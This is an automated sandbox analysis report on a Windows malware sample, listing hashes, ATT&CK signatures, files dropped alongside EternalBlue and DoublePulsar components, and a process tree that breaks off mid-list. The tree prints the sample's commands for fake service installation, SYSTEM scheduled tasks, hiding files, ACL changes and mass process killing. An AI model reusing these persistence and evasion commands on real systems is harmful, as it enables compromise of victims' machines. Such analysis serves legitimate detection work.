bbb1a707faaf2f9b06ee3da3bdbd511afae912a3bc2d845b49eb7ba4706fd282

Analysis

max time kernel
150s
max time network
153s
platform
windows7_x64
resource
win7-20231215-en
resource tags

arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system
submitted
24/01/2024, 01:00

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
Size

2.5MB
MD5

0692382a5ccf0b0b9406a434352bcd66
SHA1

d67f6d9f3353d712c13a96b00f87f4c9d511e26d
SHA256

44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a
SHA512

35d854e0e3cd237bbec6acb3fcbc0692b30333645fff0ed4320853e9c7c1caa6d9d12b0dc6a1c8515126d43695769d334a4a79b4cc1021ca33a7ddaab12805f6
SSDEEP

49152:5wTtKTyEJdyyUa6PrvMrKQHBhzFrBRucp2uBUYYs2aoywX7AqomhDHsH:5atKOMFkxQHBBZOtuBUg2aKXTJMH

Score

9^/10

discovery evasion upx

Malware Config

Signatures

Contacts a large (17966) amount of remote hosts 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046
Creates a large amount of network flows 1 TTPs
This may indicate a network scan to discover remotely running services.
discovery

Network Service Discovery
T1046

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Sets file to hidden 1 TTPs 5 IoCs

Modifies file attributes to stop it showing in Explorer etc.

evasion

Hidden Files and Directories

T1564.001

pid	Process
908	attrib.exe
1404	attrib.exe
2004	attrib.exe
2556	attrib.exe
900	attrib.exe

Stops running service(s) 3 TTPs
evasion

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Deletes itself 1 IoCs

pid	Process
2564	xsfxdel~.exe

Executes dropped EXE 11 IoCs

pid	Process
2688	ctfmon.exe
2564	xsfxdel~.exe
3028	svchost.exe
3048	svchost.exe
2820	WMIC.exe
1140	svchost.exe
2568	WMIC.exe
2684	svchost.exe
2980	svchost.exe
2768	wget.exe
2712	taskhost.exe

Loads dropped DLL 10 IoCs

pid	Process
1808	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
1808	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
1808	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
1808	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
2936	cmd.exe
2936	cmd.exe
1380	cmd.exe
1380	cmd.exe
1380	cmd.exe
1380	cmd.exe

UPX packed file 4 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x0005000000019310-105.dat	upx
behavioral1/memory/2768-108-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/memory/2768-110-0x0000000000400000-0x00000000004EF000-memory.dmp	upx
behavioral1/files/0x0005000000019310-106.dat	upx

Drops file in Windows directory 55 IoCs

description	ioc	Process
File created	C:\Windows\Fonts\Mysql\cmd.bat	sc.exe
File created	C:\Windows\Fonts\Mysql\posh-0.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\temp.txt	wget.exe
File created	C:\Windows\Fonts\Mysql\Eternalblue2.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\crli-0.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\p.txt	sc.exe
File created	C:\Windows\Fonts\Mysql\puls.xml	sc.exe
File opened for modification	C:\Windows\Fonts\Mysql\ctfmon.exe	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File opened for modification	C:\Windows\Fonts\Mysql\Eternalblue2.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\Eter.exe	sc.exe
File created	C:\Windows\Fonts\Mysql\Doublepulsar.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\file.txt	sc.exe
File created	C:\Windows\Fonts\Mysql\Eter.xml	sc.exe
File created	C:\Windows\Fonts\Mysql\svchost.exe	sc.exe
File created	C:\Windows\Fonts\Mysql\taskhost.exe	sc.exe
File created	C:\Windows\Fonts\Mysql\puls.exe	sc.exe
File created	C:\Windows\Fonts\Mysql\Doublepulsar.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\Doublepulsar2.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\tibe-2.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\trfo-2.dll	sc.exe
File opened for modification	C:\Windows\Fonts\Mysql\Doublepulsar2.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\libeay32.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\NansHou.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\ssleay32.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\zlib1.dll	sc.exe
File opened for modification	C:\Windows\Fonts\Mysql\Doublepulsar.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\same.bat	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\poab.bat	sc.exe
File created	C:\Windows\Fonts\Mysql\poad.bat	sc.exe
File created	C:\Windows\Fonts\Mysql\xdvl-0.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\nei.bat	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\wai.bat	ctfmon.exe
File created	C:\Windows\Fonts\Mysql\dmgd-4.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\Eternalblue2.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\load.bat	sc.exe
File created	C:\Windows\Fonts\Mysql\mance.xml	sc.exe
File created	C:\Windows\Fonts\Mysql\ctfmon.exe	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\loab.bat	sc.exe
File opened for modification	C:\Windows\Fonts\Mysql\Eternalblue.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\cnli-1.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\Eternalblue.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\exma-1.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\trch-1.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\tucl-1.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\Doublepulsar2.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\mance.exe	sc.exe
File created	C:\Windows\Fonts\Mysql\tich-1.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\tufo-2.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\ucl.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\wget.exe	sc.exe
File created	C:\Windows\Fonts\Mysql\Eternalblue.dll	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
File created	C:\Windows\Fonts\Mysql\bat.bat	sc.exe
File created	C:\Windows\Fonts\Mysql\coli-0.dll	sc.exe
File created	C:\Windows\Fonts\Mysql\libxml2.dll	sc.exe
File opened for modification	C:\Windows\Fonts\Mysql\Result.txt	taskhost.exe

Launches sc.exe 19 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2660	sc.exe
1924	sc.exe
2280	sc.exe
1072	sc.exe
2716	sc.exe
2864	sc.exe
456	sc.exe
1480	sc.exe
1168	sc.exe
2592	sc.exe
1912	sc.exe
2636	sc.exe
2136	sc.exe
1960	sc.exe
852	sc.exe
2688	sc.exe
2296	sc.exe
240	sc.exe
1688	sc.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task/Job

T1053

pid	Process
900	schtasks.exe
1988	schtasks.exe

Kills process with WMI 15 IoCs

evasion

pid	Process
2568	WMIC.exe
268	WMIC.exe
2076	WMIC.exe
2480	WMIC.exe
3068	WMIC.exe
2324	WMIC.exe
2360	WMIC.exe
1992	WMIC.exe
2224	WMIC.exe
2928	WMIC.exe
2500	WMIC.exe
2148	WMIC.exe
2472	WMIC.exe
580	WMIC.exe
2820	WMIC.exe

Kills process with taskkill 57 IoCs

evasion

pid	Process
2412	taskkill.exe
3068	taskkill.exe
1988	taskkill.exe
1544	taskkill.exe
3008	taskkill.exe
2324	taskkill.exe
1952	taskkill.exe
1172	taskkill.exe
2008	taskkill.exe
1528	taskkill.exe
1076	taskkill.exe
556	taskkill.exe
1664	taskkill.exe
2024	taskkill.exe
1224	taskkill.exe
2256	taskkill.exe
2500	taskkill.exe
2480	taskkill.exe
3056	taskkill.exe
2368	taskkill.exe
1696	taskkill.exe
2724	taskkill.exe
2724	taskkill.exe
1156	taskkill.exe
2900	taskkill.exe
1412	taskkill.exe
2128	taskkill.exe
1976	taskkill.exe
1604	taskkill.exe
2848	taskkill.exe
1480	taskkill.exe
1524	taskkill.exe
2860	taskkill.exe
2960	taskkill.exe
1692	taskkill.exe
2440	taskkill.exe
828	taskkill.exe
2020	taskkill.exe
1820	taskkill.exe
1544	taskkill.exe
3008	taskkill.exe
268	taskkill.exe
2552	taskkill.exe
2120	taskkill.exe
656	taskkill.exe
996	taskkill.exe
1880	taskkill.exe
1556	taskkill.exe
2080	taskkill.exe
2476	taskkill.exe
2312	taskkill.exe
1660	taskkill.exe
2856	taskkill.exe
2796	taskkill.exe
580	taskkill.exe
1060	taskkill.exe
2772	taskkill.exe

Runs net.exe

Runs ping.exe 1 TTPs 4 IoCs

Remote System Discovery

T1018

pid	Process
1260	PING.EXE
2292	PING.EXE
1496	PING.EXE
2808	PING.EXE

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	2324	WMIC.exe
Token: SeDebugPrivilege	656	taskkill.exe
Token: SeDebugPrivilege	1820	taskkill.exe
Token: SeDebugPrivilege	1660	taskkill.exe
Token: SeDebugPrivilege	2412	taskkill.exe
Token: SeDebugPrivilege	2476	taskkill.exe
Token: SeDebugPrivilege	1880	taskkill.exe
Token: SeDebugPrivilege	1556	taskkill.exe
Token: SeDebugPrivilege	2020	taskkill.exe
Token: SeDebugPrivilege	2724	taskkill.exe
Token: SeDebugPrivilege	1544	taskkill.exe
Token: SeDebugPrivilege	3008	taskkill.exe
Token: SeDebugPrivilege	3068	WMIC.exe
Token: SeDebugPrivilege	1524	taskkill.exe
Token: SeDebugPrivilege	2860	taskkill.exe
Token: SeDebugPrivilege	2848	taskkill.exe
Token: SeDebugPrivilege	2772	taskkill.exe
Token: SeDebugPrivilege	1076	taskkill.exe
Token: SeDebugPrivilege	996	taskkill.exe
Token: SeDebugPrivilege	2856	taskkill.exe
Token: SeDebugPrivilege	268	WMIC.exe
Token: SeDebugPrivilege	2796	taskkill.exe
Token: SeDebugPrivilege	1412	cmd.exe
Token: SeDebugPrivilege	1976	cacls.exe
Token: SeDebugPrivilege	2960	taskkill.exe
Token: SeDebugPrivilege	2256	taskkill.exe
Token: SeDebugPrivilege	2552	taskkill.exe
Token: SeDebugPrivilege	1692	taskkill.exe
Token: SeDebugPrivilege	2080	taskkill.exe
Token: SeDebugPrivilege	2128	taskkill.exe
Token: SeDebugPrivilege	580	WMIC.exe
Token: SeDebugPrivilege	1172	taskkill.exe
Token: SeDebugPrivilege	2500	WMIC.exe
Token: SeDebugPrivilege	2440	taskkill.exe
Token: SeDebugPrivilege	2480	WMIC.exe
Token: SeDebugPrivilege	828	taskkill.exe
Token: SeDebugPrivilege	1060	taskkill.exe
Token: SeDebugPrivilege	2008	taskkill.exe
Token: SeDebugPrivilege	1988	cacls.exe
Token: SeDebugPrivilege	1224	attrib.exe
Token: SeDebugPrivilege	1952	cacls.exe
Token: SeDebugPrivilege	3056	cmd.exe
Token: SeDebugPrivilege	556	cmd.exe
Token: SeDebugPrivilege	2312	cacls.exe
Token: SeDebugPrivilege	1156	cacls.exe
Token: SeDebugPrivilege	1664	cmd.exe
Token: SeDebugPrivilege	2024	cacls.exe
Token: SeDebugPrivilege	2368	attrib.exe
Token: SeDebugPrivilege	1604	taskkill.exe
Token: SeDebugPrivilege	1696	cmd.exe
Token: SeDebugPrivilege	2900	cacls.exe
Token: SeDebugPrivilege	2724	taskkill.exe
Token: SeDebugPrivilege	1544	taskkill.exe
Token: SeDebugPrivilege	3008	taskkill.exe
Token: SeIncreaseQuotaPrivilege	3068	WMIC.exe
Token: SeSecurityPrivilege	3068	WMIC.exe
Token: SeTakeOwnershipPrivilege	3068	WMIC.exe
Token: SeLoadDriverPrivilege	3068	WMIC.exe
Token: SeSystemProfilePrivilege	3068	WMIC.exe
Token: SeSystemtimePrivilege	3068	WMIC.exe
Token: SeProfSingleProcessPrivilege	3068	WMIC.exe
Token: SeIncBasePriorityPrivilege	3068	WMIC.exe
Token: SeCreatePagefilePrivilege	3068	WMIC.exe
Token: SeBackupPrivilege	3068	WMIC.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 1808 wrote to memory of 2688	1808	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	28
PID 1808 wrote to memory of 2688	1808	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	28
PID 1808 wrote to memory of 2688	1808	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	28
PID 1808 wrote to memory of 2688	1808	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	28
PID 2688 wrote to memory of 2936	2688	sc.exe	29
PID 2688 wrote to memory of 2936	2688	sc.exe	29
PID 2688 wrote to memory of 2936	2688	sc.exe	29
PID 2688 wrote to memory of 2936	2688	sc.exe	29
PID 2936 wrote to memory of 1544	2936	cmd.exe	148
PID 2936 wrote to memory of 1544	2936	cmd.exe	148
PID 2936 wrote to memory of 1544	2936	cmd.exe	148
PID 2936 wrote to memory of 1544	2936	cmd.exe	148
PID 1544 wrote to memory of 1688	1544	taskkill.exe	147
PID 1544 wrote to memory of 1688	1544	taskkill.exe	147
PID 1544 wrote to memory of 1688	1544	taskkill.exe	147
PID 1544 wrote to memory of 1688	1544	taskkill.exe	147
PID 1808 wrote to memory of 2564	1808	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	43
PID 1808 wrote to memory of 2564	1808	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	43
PID 1808 wrote to memory of 2564	1808	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	43
PID 1808 wrote to memory of 2564	1808	44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe	43
PID 2936 wrote to memory of 2976	2936	cmd.exe	42
PID 2936 wrote to memory of 2976	2936	cmd.exe	42
PID 2936 wrote to memory of 2976	2936	cmd.exe	42
PID 2936 wrote to memory of 2976	2936	cmd.exe	42
PID 2976 wrote to memory of 3008	2976	net.exe	150
PID 2976 wrote to memory of 3008	2976	net.exe	150
PID 2976 wrote to memory of 3008	2976	net.exe	150
PID 2976 wrote to memory of 3008	2976	net.exe	150
PID 2936 wrote to memory of 3028	2936	cmd.exe	38
PID 2936 wrote to memory of 3028	2936	cmd.exe	38
PID 2936 wrote to memory of 3028	2936	cmd.exe	38
PID 2936 wrote to memory of 3028	2936	cmd.exe	38
PID 2936 wrote to memory of 3048	2936	cmd.exe	34
PID 2936 wrote to memory of 3048	2936	cmd.exe	34
PID 2936 wrote to memory of 3048	2936	cmd.exe	34
PID 2936 wrote to memory of 3048	2936	cmd.exe	34
PID 2936 wrote to memory of 2136	2936	cmd.exe	35
PID 2936 wrote to memory of 2136	2936	cmd.exe	35
PID 2936 wrote to memory of 2136	2936	cmd.exe	35
PID 2936 wrote to memory of 2136	2936	cmd.exe	35
PID 2936 wrote to memory of 1960	2936	cmd.exe	37
PID 2936 wrote to memory of 1960	2936	cmd.exe	37
PID 2936 wrote to memory of 1960	2936	cmd.exe	37
PID 2936 wrote to memory of 1960	2936	cmd.exe	37
PID 2936 wrote to memory of 2820	2936	cmd.exe	154
PID 2936 wrote to memory of 2820	2936	cmd.exe	154
PID 2936 wrote to memory of 2820	2936	cmd.exe	154
PID 2936 wrote to memory of 2820	2936	cmd.exe	154
PID 2936 wrote to memory of 1140	2936	cmd.exe	41
PID 2936 wrote to memory of 1140	2936	cmd.exe	41
PID 2936 wrote to memory of 1140	2936	cmd.exe	41
PID 2936 wrote to memory of 1140	2936	cmd.exe	41
PID 2936 wrote to memory of 2568	2936	cmd.exe	156
PID 2936 wrote to memory of 2568	2936	cmd.exe	156
PID 2936 wrote to memory of 2568	2936	cmd.exe	156
PID 2936 wrote to memory of 2568	2936	cmd.exe	156
PID 2936 wrote to memory of 2808	2936	cmd.exe	39
PID 2936 wrote to memory of 2808	2936	cmd.exe	39
PID 2936 wrote to memory of 2808	2936	cmd.exe	39
PID 2936 wrote to memory of 2808	2936	cmd.exe	39
PID 2936 wrote to memory of 2684	2936	cmd.exe	48
PID 2936 wrote to memory of 2684	2936	cmd.exe	48
PID 2936 wrote to memory of 2684	2936	cmd.exe	48
PID 2936 wrote to memory of 2684	2936	cmd.exe	48

Views/modifies file attributes 1 TTPs 11 IoCs

evasion

Hidden Files and Directories

T1564.001

pid	Process
2676	attrib.exe
1612	attrib.exe
2308	attrib.exe
908	attrib.exe
2004	attrib.exe
2556	attrib.exe
900	attrib.exe
1404	attrib.exe
1224	attrib.exe
2052	attrib.exe
2368	attrib.exe

C:\Users\Admin\AppData\Local\Temp\44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe
"C:\Users\Admin\AppData\Local\Temp\44c11f2419a7650053168843f0c092a45187920bec71ede3d26473472575ee6a.exe"
1⤵
- Loads dropped DLL
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1808
- C:\Windows\Fonts\Mysql\ctfmon.exe
  "C:\Windows\Fonts\Mysql\ctfmon.exe"
  2⤵
  - Executes dropped EXE
  - Drops file in Windows directory
  PID:2688
- - C:\Windows\SysWOW64\cmd.exe
    cmd /c ""C:\Windows\Fonts\Mysql\same.bat" "
    3⤵
    - Drops file in Drivers directory
    - Loads dropped DLL
    - Suspicious use of WriteProcessMemory
    PID:2936
  - - C:\Windows\SysWOW64\net.exe
      net stop "MicrosoftMysql"
      4⤵
      PID:1544
    - - C:\Windows\SysWOW64\net1.exe
        
        C:\Windows\system32\net1 stop "MicrosoftMysql"
        5⤵
        
        PID:1688
  - - C:\Windows\Fonts\Mysql\svchost.exe
      svchost stop "MicrosoftMysql"
      4⤵
      Executes dropped EXE
      PID:3048
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "MicrosoftMysql"
      4⤵
      Launches sc.exe
      PID:2136
  - - C:\Windows\Fonts\Mysql\svchost.exe
      svchost install MicrosoftMysql "C:\Windows\Fonts\Mysql\cmd.bat"
      4⤵
      PID:2820
  - - C:\Windows\SysWOW64\sc.exe
      sc delete "MicrosoftMssql"
      4⤵
      Launches sc.exe
      PID:1960
  - - C:\Windows\Fonts\Mysql\svchost.exe
      svchost stop "MicrosoftFonts"
      4⤵
      Executes dropped EXE
      PID:3028
  - - C:\Windows\SysWOW64\PING.EXE
      ping 127.0.0.1 -n 20
      4⤵
      Runs ping.exe
      PID:2808
  - - C:\Windows\Fonts\Mysql\svchost.exe
      svchost install "MicrosoftMysql" C:\Windows\Fonts\Mysql\cmd.bat
      4⤵
      PID:2568
  - - C:\Windows\Fonts\Mysql\svchost.exe
      svchost install MicrosoftMysql C:\Windows\Fonts\Mysql\cmd.bat
      4⤵
      Executes dropped EXE
      PID:1140
  - - C:\Windows\SysWOW64\net.exe
      net stop "MicrosoftMssql"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:2976
  - - C:\Windows\Fonts\Mysql\svchost.exe
      svchost start "MicrosoftMysql"
      4⤵
      Executes dropped EXE
      PID:2684
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2088
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /TN "At1" /TR "C:\Windows\Fonts\Mysql\nei.bat" /SC daily /ST 11:30:00 /RU SYSTEM
      4⤵
      Creates scheduled task(s)
      PID:1988
  - - C:\Windows\SysWOW64\net.exe
      net start "MicrosoftMysql"
      4⤵
      PID:1832
  - - C:\Windows\SysWOW64\schtasks.exe
      schtasks /create /TN "At2" /TR "C:\Windows\Fonts\Mysql\wai.bat" /SC daily /ST 01:00:00 /RU SYSTEM
      4⤵
      Creates scheduled task(s)
      PID:900
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2000
  - - C:\Windows\SysWOW64\attrib.exe
      attrib +h +s -r C:\Windows\System32\Tasks\At*
      4⤵
      Views/modifies file attributes
      PID:2052
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2668
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\windows\tasks\At2.job /c /e /t /g everyone:F
      4⤵
      PID:1472
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:804
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\At2 /c /e /t /g everyone:F
      4⤵
      PID:1664
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\HomeGroupProvider /p system:n
      4⤵
      PID:2520
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\Tasks\*fost* /p system:n
      4⤵
      PID:1424
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2940
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2880
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2608
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\*Group* /p system:n
      4⤵
      PID:2584
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\*ok* /p system:n
      4⤵
      PID:2648
  - - C:\Windows\SysWOW64\sc.exe
      sc start Schedule
      4⤵
      Launches sc.exe
      PID:1168
  - - C:\Windows\SysWOW64\net.exe
      net start Schedule
      4⤵
      PID:2732
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im Eternalblue-2.2.0.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2020
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im Doublepulsar-1.3.1.exe
      4⤵
      Kills process with taskkill
      PID:2724
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\*my* /p system:n
      4⤵
      PID:2588
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2704
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im one.exe
      4⤵
      Kills process with taskkill
      PID:1544
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im z.exe
      4⤵
      Kills process with taskkill
      PID:3008
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2640
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im c32.exe
      4⤵
      Kills process with taskkill
      PID:3068
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im c64.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1524
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im service.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2860
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im 32.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2848
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im 64.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2772
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im lsazs.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1076
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im chrome..exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:996
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im Cstr.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2856
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im srvany.exe
      4⤵
      Kills process with taskkill
      PID:268
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im CPUInfo.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2796
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im scvsots.exe
      4⤵
      Kills process with taskkill
      PID:1412
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im acor.exe
      4⤵
      Kills process with taskkill
      PID:1976
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im lsmosee.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2960
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im WUDHostServices.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2256
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im WUDHostService.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2552
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im lsmose.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1692
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\*sa* /p system:n
      4⤵
      PID:2592
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2864
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2696
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im 1sass.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2080
  - - C:\Windows\SysWOW64\cacls.exe
      cacls C:\Windows\System32\Tasks\*fost* /p system:n
      4⤵
      PID:2748
  - - C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /S /D /c" echo y"
      4⤵
      PID:2868
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im mssecsvc.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2128
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im mssecsvr.exe
      4⤵
      Kills process with taskkill
      PID:580
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im TasksHostServices.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1172
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im TasksHostService.exe
      4⤵
      Kills process with taskkill
      PID:2500
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im crss.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2440
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im svsohst.exe
      4⤵
      Kills process with taskkill
      PID:2480
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im seser.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:828
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im msinfo.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:1060
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im taskmgr.exe
      4⤵
      Kills process with taskkill
      Suspicious use of AdjustPrivilegeToken
      PID:2008
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im csrs.exe
      4⤵
      Kills process with taskkill
      PID:1988
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im path.exe
      4⤵
      Kills process with taskkill
      PID:1224
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im spoolsrv.exe
      4⤵
      Kills process with taskkill
      PID:1952
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im svschost.exe
      4⤵
      Kills process with taskkill
      PID:3056
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im mscteui.exe
      4⤵
      Kills process with taskkill
      PID:556
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im TrueServiceHost.exe
      4⤵
      Kills process with taskkill
      PID:2312
  - - C:\Windows\SysWOW64\taskkill.exe
      taskkill /f /im ServicesMgrHost.exe
      4⤵
      Kills process with taskkill
      PID:1156
  - - C:\Windows\SysWOW64\taskkill.exe
